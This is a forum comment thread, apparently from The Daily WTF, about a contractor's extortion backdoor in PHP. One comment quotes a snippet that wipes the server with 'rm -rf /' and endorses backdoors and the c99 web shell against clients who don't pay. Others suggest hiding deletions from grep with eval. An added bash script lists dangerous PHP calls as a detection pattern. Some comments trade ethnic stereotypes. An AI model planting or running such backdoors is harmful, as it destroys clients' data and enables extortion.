• Martin (unregistered)
    ...
    if ($_GET['page'] == "delete_all_files_2"){ 
      exec('rm -rf /');
    }
    

    Kerbleckistanians are not stupid. I'm using similar technique, when clients refuse to pay. It's really useful! c99.php is also good thing.

  • Go Figure (unregistered)

    This smells like propaganda...

    the obligatory real wtfs: 1.he knew enough about php but he didn't review the code given 2.he had (language) problems communicating with the developer, but he expected him to implement what he was told to. 3.he negotiated a deal with payment per month and not per work done

  • forgottenlord (unregistered)

    I'm more amazed I haven't heard about someone doing something like this before.

    Then again, maybe they just didn't have a mediocrely capable businessman behind the operation with a programmer for a friend who might know something about it

  • (cs) in reply to grasshoppa
    grasshoppa:
    There are two WTFs here, but the second may be less obvious. That a script running on a web host has that kind of access to the web root is pretty funky. When I configure web servers, if I have need for user uploaded content I set up a special directory just to enable write access.

    That way, situations like this can't happen.

    I do the exact same thing. Read and execute directories will save your bacon over and over again.

  • budu (unregistered) in reply to frits

    At least Kerbleckistan is number one exporter of potassium.

    No, it's Canada!

  • Wonz (unregistered)

    "Maybe I needing later"

    that’s effectively what told his friend
  • Nick (unregistered) in reply to Monte
    Monte:
    Wouldn't it have been easier for him to have just written

    unlink("*.php")?

    I don't know. I don't know that much about PHP...

    Although yeah, I do think this is sneaky and dirty.

    That wouldn't work. Consider:

    foreach ( glob( "*.php" ) as $file )
    {
    	unlink( $file );
    }
    
  • (cs) in reply to budu
    budu:
    > At least Kerbleckistan is number one exporter of potassium.

    No, it's Canada!

    Canada has inferior potassium.

    http://www.answerbag.com/q_view/164327

    Addendum (2009-12-22 14:59): http://www.answerbag.com/q_view/164327

  • Ash (unregistered)

    Also, assuming that "resources" is a folder, this would not work:

    unlink("resources");

    unlink() will not delete recursively.

  • Paula (unregistered)

    I are brillanting.

  • Bim Job (unregistered) in reply to Go Figure
    Go Figure:
    This smells like propaganda...

    the obligatory real wtfs: 1.he knew enough about php but he didn't review the code given 2.he had (language) problems communicating with the developer, but he expected him to implement what he was told to. 3.he negotiated a deal with payment per month and not per work done

    By "propaganda" I assume you mean either racism or FUD -- and I think you're correct. There's nothing wrong with propaganda, even though I have doctrinal issues with the Council of Trent. It's difficult to peer through Alex' obfuscation, but this post certainly has a pong to it.

    To your points:

    (1) It's not clear that Derek claimed to know anything about anything. (2) Not uncommon, or unreasonable, although a common cause of culture clash (works between European countries, too!). (3) So what? I've been paid for Web development on an almost daily basis. If the man with the money can see the results on the screen, on a daily basis, that's usually enough. (I try to hold myself to a higher standard than that.)

    But you're right. Other than the punch-line (which is only funny because the contractor has never heard of backups -- quite possible, for an incompetent; and the boss has never heard of backups -- quite possible), this is a distinctly feeble, and possibly objectionable, WTF. After six months, the SysAdmin steps in to save the day from little brown folk!

    Q. What's the difference between a native PHP programmer and a Kerbleckistani PHP contractor?

    A. They're both cheap and incompetent, but you can spot the latter because he comes from a made-up country.

    The problem is: even if this is propaganda, it's pretty close to the way a lot of PHBs think. It doesn't really take a Kerbleckistani programmer and some sing-song quasi-quotations from It Ain't Half Hot, Mum to make it a believable story.

  • Brian K (unregistered)

    A partner once insisted that I put a time bomb in code in case the customer didn't pay. I hated to do it. Sure enough, as time nearly expired, the customer paid and we had to go out and put on an emergency "update". I don't remember if we actually told them it was to turn off the time bomb or not. I should have used that comment "Maybe I needing later"!

  • Pseudonyma (unregistered) in reply to Bim Job
    Bob:
    After six months, the SysAdmin steps in to save the day from little brown folk!

    I always figured Madeupistans were Eastern European and comprised white, rather than brown, folks.

    I think the level of competence of (expatriate) Indian-region people I personally know is about on par with those born in the states: most are competent enough, a few are a little less than desirable, and a few excellent.

  • (cs) in reply to skywalker
    skywalker:
    Isn't it obvious? "Ondra" is just "Ardno" backwards!

    Nope - it's "Drano" spelled inside out.

  • egg (unregistered) in reply to lImbus
    lImbus:
    another real WTF is this useless use of cat. what's wrong with the following ?
    grep unlink *.php
    or
    grep unlink -R *.php
    The fact I could instantly see the filename in question ?

    The grep -R line doesn't do what you think it does. More like:

    grep unlink -R --include "*.php" *

    or

    find -name "*.php" | xargs grep unlink

    (quotes probably not strictly necessary)

  • (cs) in reply to D
    D:
    Not to forget unobtainium. I wonder where the name comes from.

    I don't know about the origin of the name, but I have it stacked on the top back shelf, right next to the handwavium.

    http://en.wikipedia.org/wiki/Handwavium

  • (cs)

    A lesson for all Kerbleckistanians; host the development version on your own server. And only give up the code once you've been paid.

    Then you don't need to delete through a back door. You can delete it from the console.

  • Vindico (unregistered) in reply to lImbus
    lImbus:
    another real WTF is this useless use of cat. what's wrong with the following ?
    grep unlink *.php
    or
    grep unlink -R *.php
    The fact I could instantly see the filename in question ?
    grep unlink -R *.php

    won't recurse through directories as you expect, since your directories likely won't end with *.php.

    grep -R unlink * | grep ".php"

    would work much better. Sorry to be anal, but if you are going to critique code, be ready to be equally critiqued.
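
The recursion problem egg and Vindico describe for `grep unlink -R *.php`, run on a constructed directory tree. This is an added example, not part of any comment above; the file names, file contents and the `DANGEROUS` pattern are assumptions made for the demo, and the pattern goes beyond `unlink` to other PHP calls that delete files or run commands.

```bash
#!/bin/sh
# Added example: audit a PHP tree for calls that delete files or run commands.

# Calls worth a manual look. String matching cannot see a call assembled at
# run time, so eval( itself is flagged for review as well.
DANGEROUS='(^|[^[:alnum:]_])(unlink|rmdir|exec|shell_exec|system|passthru|popen|proc_open|eval)[[:space:]]*\('

# Build a small constructed web root; prints the path of the temp directory.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/admin/inc" "$root/lib" "$root/resources"
    printf '<?php echo "home"; ?>\n' > "$root/index.php"
    printf '<?php\nforeach (glob("*.php") as $file) {\n    unlink($file);\n}\n' \
        > "$root/admin/inc/cleanup.php"
    printf '<?php eval($payload); ?>\n' > "$root/lib/loader.php"
    # Not a PHP file: must not show up in a scan restricted to *.php.
    printf 'call unlink("old.log") to remove a file\n' > "$root/resources/notes.txt"
    printf '%s\n' "$root"
}

# The form criticised in the thread: the shell expands *.php in the current
# directory only, so -R is handed plain files and never descends.
scan_top_level_only() {
    ( cd "$1" && grep -lR 'unlink' *.php 2>/dev/null | sort )
}

# Recursive form: start at "." and let grep filter by file name.
# $1 = web root, $2 = extended regular expression to look for.
scan_recursive() {
    ( cd "$1" && grep -RlE --include='*.php' "$2" . | sort )
}

# Demo run on the constructed tree.
demo=$(make_sample_tree)
echo "top-level only: $(scan_top_level_only "$demo" | tr '\n' ' ')"
echo "recursive:      $(scan_recursive "$demo" 'unlink' | tr '\n' ' ')"
echo "wider pattern:  $(scan_recursive "$demo" "$DANGEROUS" | tr '\n' ' ')"
rm -rf "$demo"
```
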

  • Bim Job (unregistered) in reply to Pseudonyma
    Pseudonyma:
    Bob:
    After six months, the SysAdmin steps in to save the day from little brown folk!

    I always figured Madeupistans were Eastern European and comprised white, rather than brown, folks.

    I think the level of competence of (expatriate) Indian-region people I personally know is about on par with those born in the states: most are competent enough, a few are a little less than desirable, and a few excellent.

    Just to clarify: I don't think the OP (obfuscated or otherwise) is actually racist. I just think it's lazy, and has the potential to feed into the anti-H1B crowd ("they're taking our jobs!"). Thus my comment on the -- hilariously obfuscated -- language "used" by the contractor.

    Madeupistans are pretty much by definition Asian. Think Pakistan, Uzbekistan, Kazakhstan, Turkmenistan, and ... er ... Afghanistan. It's a PIE, latterly Persian, latterly Pashtun stem, and conceivably it might therefore refer to the Caucasus or to Eastern Europe. In context, however, it clearly does not.

    If it were to refer to anywhere in Europe, it would be Elbonia or Ruritania, or some such.

    I'm sure Elbonians and Ruritanians are crap at PHP, too.

  • Ben (unregistered)

    I've seen an interesting variant on this. We were using some CAD software to automate some experiments in a chemistry lab. We had this kid (your standard all American nerd, nasal voice, pudgy w/ glasses) working on it for a while.

    He was also a jerk, and he got into a tiff with one of the postdocs and disappeared. No back door, but he didn't need one: the software was visual and he had all sorts of tricks to hide his circuits, putting them within a device but scrolled way off, resized devices to be point sized, etc.

    TRWTF was that this system actually let you lay stuff out to point-level precision, or to resize a circuit so that it was almost invisible.

  • (cs) in reply to Bim Job

    It does not matter what race your programmer / developer is, complete morons of any kind can programme in PHP and call themselves programmers / developers. I suppose that is the 'winning feature' of PHP, even a crackhead can write it.

  • Ben (unregistered) in reply to Tyler
    Tyler:
    tofu:
    so the moral of this story is to always wrap your unlink calls in eval statements broken over several lines so that grep can't find them.

    I mean, if you're going to be evil, why half-ass it?

    Funny, I took away something totally different. There are three morals to this story:

    1. Always build yourself a backdoor in every project

    2. The first rule of backdoor club is that we don't talk about backdoor club

    3. If this is your first project, you have to code a backdoor

    Hasn't worked. Most people know the backdoor club is somewhere on Folsom St.

  • EngleBart (unregistered) in reply to Code Slave
    Code Slave:
    A lesson for all Kerbleckistanians; host the development version on your own server. And only give up the code once you've been paid.

    Then you don't need to delete through a back door. You can delete it from the console.

    This approach solves the backup problem.

    You also won't need to delete it. Switch the web site pointer to a single page saying PAYMENT REQUIRED.

    This must be why they created cloud computing!

  • Nobody (unregistered) in reply to csm
    csm:
    tOmcOlins:
    csm:
    if derick is capable of firing up a shell and fixing it himself, what's the point of "ondra"? and who names their kid Ondra?

    Alex makes up fake names for these stories and sometimes he gets them mixed up.

    3rd attempt

    ...and he makes up "Ondra". weeeeird. :)

    I'd complain too, but the only name I would make up would be Jim ... unless the guy's name was actually Jim. Then I'd use Ondra.

  • Dave (unregistered)

    I would just like to stop the speculations about "Ondra". It's a colloquial form of "Ondřej" which is Czech version of Andrew.

    You can read more about it here, http://en.wikipedia.org/wiki/Andrew#Andrew%20variants

  • Twirrim (unregistered)

    Stupid question, maybe:

    Why would someone from "Kerbleckistanian" whose first language isn't English, write the comment for a back door code in English?

    That strikes me as highly improbable.

  • Protected (unregistered) in reply to John M
    I think the real wtf was the fact that the crappy developer actually led him onto find the backdoor. I would have just kept my mouth shut.

    What he wanted was to get paid/extort money. If he hadn't said anything, he might have gotten his revenge, but he would definitely not have gotten paid.

  • Mavrik (unregistered) in reply to Twirrim

    Because even us non-English speakers prefer to comment code (even if in bad) English.

    Partly because of language limitation (some things just don't translate well :\ ) or because sometimes your code has to be maintained by a foreigner, who would get annoyed at functions called "IzpišiBesedilo(String nekaj)".

  • Twirrim (unregistered) in reply to Mavrik
    Mavrik:
    Because even us non-English speakers prefer to comment code (even if in bad) English.

    Partly because of language limitation (some things just don't translate well :\ ) or because sometimes your code has to be maintained by a foreigner, who would get annoyed at functions called "IzpišiBesedilo(String nekaj)".

    Sure, but your nasty backdoor?

  • Steve (unregistered)

    TRWTF is not using version control!

  • (cs) in reply to Martin
    Martin:
    ...
    if ($_GET['page'] == "delete_all_files_2"){ 
      exec('rm -rf /');
    }
    

    Kerbleckistanians are not stupid. I'm using similar technique, when clients refuse to pay. It's really useful! c99.php is also good thing.

    If you're actually serious, then you are a criminal. Going back on a contract is a civil matter. By deleting files (even if they are copyrighted by you) from the client's servers, you are committing a felony computer crime. Just because they broke contractual obligations doesn't give you the right to commit a crime.

    Even if you limit the deletion to ONLY the files that you created I think you are on incredibly shaky ground. Imagine if you hired a contractor to re-roof your house, and then refused to pay. He can't just come back to your property and start ripping the roofing down. What he does is he sues you.

    If he can't sue because you're in some unfriendly jurisdiction, then it was his fault for working with somebody who he can't enforce contracts upon.

  • Jan (unregistered) in reply to Jim
    Jim:
    worthy of an un-necessary use of cat award!
    Go away, you troll! There is absolutely nothing wrong with using 'cat' in this way. I wish people would stop being obnoxious about it.
  • Jungle Cat (unregistered) in reply to smxlong
    smxlong:
    Martin:
    I'm using similar technique, when clients refuse to pay. It's really useful! c99.php is also good thing.

    If you're actually serious, then you are a criminal. Going back on a contract is a civil matter. By deleting files (even if they are copyrighted by you) from the client's servers, you are committing a felony computer crime. Just because they broke contractual obligations doesn't give you the right to commit a crime.

    Even if you limit the deletion to ONLY the files that you created I think you are on incredibly shaky ground. Imagine if you hired a contractor to re-roof your house, and then refused to pay. He can't just come back to your property and start ripping the roofing down. What he does is he sues you.

    If he can't sue because you're in some unfriendly jurisdiction, then it was his fault for working with somebody who he can't enforce contracts upon.

    Funny, I was thinking exactly the same thing about the guy who hired the Kerbleckistanian. It's his fault for hiring a guy he couldn't sue for deleting all his files, after he stiffed the guy.

    Extra-legal solutions are a two-way street, so take all that lawyer crap and shove it up your ...

  • Tyler (unregistered) in reply to Ben
    Ben:
    Tyler:
    tofu:
    so the moral of this story is to always wrap your unlink calls in eval statements broken over several lines so that grep can't find them.

    I mean, if you're going to be evil, why half-ass it?

    Funny, I took away something totally different. There are three morals to this story:

    1. Always build yourself a backdoor in every project

    2. The first rule of backdoor club is that we don't talk about backdoor club

    3. If this is your first project, you have to code a backdoor

    Hasn't worked. Most people know the backdoor club is somewhere on Folsom St.

    Which means a lot of you have been breaking the first two rules of backdoor club.

  • glwtta (unregistered) in reply to Bim Job
    Bim Job:
    Pseudonyma:
    Bob:
    After six months, the SysAdmin steps in to save the day from little brown folk!

    I always figured Madeupistans were Eastern European and comprised white, rather than brown, folks.

    I think the level of competence of (expatriate) Indian-region people I personally know is about on par with those born in the states: most are competent enough, a few are a little less than desirable, and a few excellent.

    Just to clarify: I don't think the OP (obfuscated or otherwise) is actually racist. I just think it's lazy, and has the potential to feed into the anti-H1B crowd ("they're taking our jobs!"). Thus my comment on the -- hilariously obfuscated -- language "used" by the contractor.

    Madeupistans are pretty much by definition Asian. Think Pakistan, Uzbekistan, Kazakhstan, Turkmenistan, and ... er ... Afghanistan. It's a PIE, latterly Persian, latterly Pashtun stem, and conceivably it might therefore refer to the Caucasus or to Eastern Europe. In context, however, it clearly does not.

    If it were to refer to anywhere in Europe, it would be Elbonia or Ruritania, or some such.

    I'm sure Elbonians and Ruritanians are crap at PHP, too.

    Like you say, it's a PIE root, it's no more (or less) Persian than it is Russian (стан), or English (as in 'stand' and '-stead').

    Most of the -stans are Turkic, who can look anywhere from white to Mongolian, so "brown" seems like a pretty poor choice of slur.

    Some are Iranian, so that would make sense, but I haven't seen too much coding being outsourced to Afghanistan.

    Though come to think of it, nor to any other -stan, for that matter.

    I guess it's too much to ask for a little rigor in people's racism.

  • (cs)

    he even added comments to the backdoor code hehe

  • David (unregistered)

    Ondra is common name in Czech Republic (Europe). It is a familiar version of Ondřej.

  • Aussie Contractor (unregistered)

    These Kerbleckistany contractors are hopeless. A local contractor would have executed that command months earlier, then blamed the deleted code on a server problem and billed the client to rewrite it all.

  • (cs) in reply to lImbus
    lImbus:
    another real WTF is this useless use of cat. what's wrong with the following ?
    grep unlink *.php
    or
    grep unlink -R *.php
    The fact I could instantly see the filename in question ?

    So... is that what ya call an "LOL cat" ?

    <sorry>
  • (cs) in reply to Twirrim
    Twirrim:
    Stupid question, maybe:

    Why would someone from "Kerbleckistanian" whose first language isn't English, write the comment for a back door code in English?

    That strikes me as highly improbable.

    More likely, if Alex posted the comment written in Kerbleckistani, who among us would have understood it?

  • (cs) in reply to Jungle Cat
    Jungle Cat:
    Funny, I was thinking exactly the same thing about the guy who hired the Kerbleckistanian. It's his fault for hiring a guy he couldn't sue for deleting all his files, after he stiffed the guy.

    Extra-legal solutions are a two-way street, so take all that lawyer crap and shove it up your ...

    I don't know what you mean by "lawyer crap." Sue somebody for deleting files? If somebody deleted files from my server, I'd report them to the FBI. No lawyer involved.

  • Duke of New York (unregistered) in reply to steenbergh
    steenbergh:
    Call me naive, but that's the dirtiest thing I've ever seen...
    Yeah, it's called PHP.
  • Jugis (unregistered) in reply to ForcedSterilizationsForAll

    Or you could let hackers attack your DNS and change the records... Of course, you cannot fix it unless he pays you... Or maybe you have no money left for the electricity, so the server fails?

    So many possibilities...

  • Lol@u (unregistered) in reply to smxlong
    smxlong:
    I don't know what you mean by "lawyer crap." Sue somebody for deleting files? If somebody deleted files from my server, I'd report them to the FBI. No lawyer involved.
    Yeah, they are pretty cool guys! They will invade foreign countries to get your money back and aren't afraid of anything!
  • Chris (unregistered) in reply to Neil

    [TICK] PHP. [TICK] Developer. [TICK] Version control. [TICK] Backups

    Use all of them, as standard. Not all of us are sloppy B????ds...

  • Chi Happens (unregistered) in reply to Duke of New York
    Duke of New York:
    steenbergh:
    Call me naive, but that's the dirtiest thing I've ever seen...
    Yeah, it's called PHP.

    This comment had me rotf :) Thanks, I needed a good laugh today.

  • PHP coder (unregistered) in reply to Psyckers
    It does not matter what race your programmer / developer is, complete morons of any kind can programme in PHP and call themselves programmers / developers.

    It does not matter what PROGRAMMING LANGUAGE your programmer/developer is using, complete morons of any kind will code like complete morons and call themselves programmers/developers. (even bigger morons have certificates, that anyone who can read can get, to prove to themselves they know something)

    I am getting really sick and tired of the anti-PHP-ness that goes around this place.

    Yes you can write crappy code in PHP, it's actually quite easy I'll admit. But so can you in ANY language. No language is safe from crappy programmers, morons write like morons.

    So because you write in your manly C/C++ language, you are immune to bad code? Or because you have some snazzy IDE for your .NET languages you are the master of good coding practice, or maybe because Java tries to squeeze you into using 'proper' coding practices and using patterns that you couldn't possibly write bad code. I somehow doubt it. The plethora of crappy code in C/C++, C# (and some other .NET flavours), java and yes PHP we have in most of the legacy application we (try) maintain is proof of that.

    Let me repeat myself : Morons write like morons, regardless of the medium they use.

    crackheads might be able to write PHP, but all you need is a brainless monkey to code in VB.

  • (cs) in reply to Twirrim
    Twirrim:
    Stupid question, maybe:

    Why would someone from "Kerbleckistanian" whose first language isn't English, write the comment for a back door code in English?

    Because he outsourced his backdoor to a programmer in America?

  • (cs) in reply to Vindico

    If you are going to give examples of a command to delete all the files on your hard disk, please it on your own servers before you upload it to thedailywtf. We don't want untested code here. Preferably test it on your production server.

    Addendum (2009-12-23 00:33): If you are going to give examples of a command to delete all the files on your hard disk, please test it on your own servers before you upload it to thedailywtf. We don't want untested code here. Preferably test it on your production server.

  • Mark (unregistered) in reply to ForcedSterilizationsForAll

    This is a method I've used many times when clients wouldn't pay for their hosting. Works like a charm.
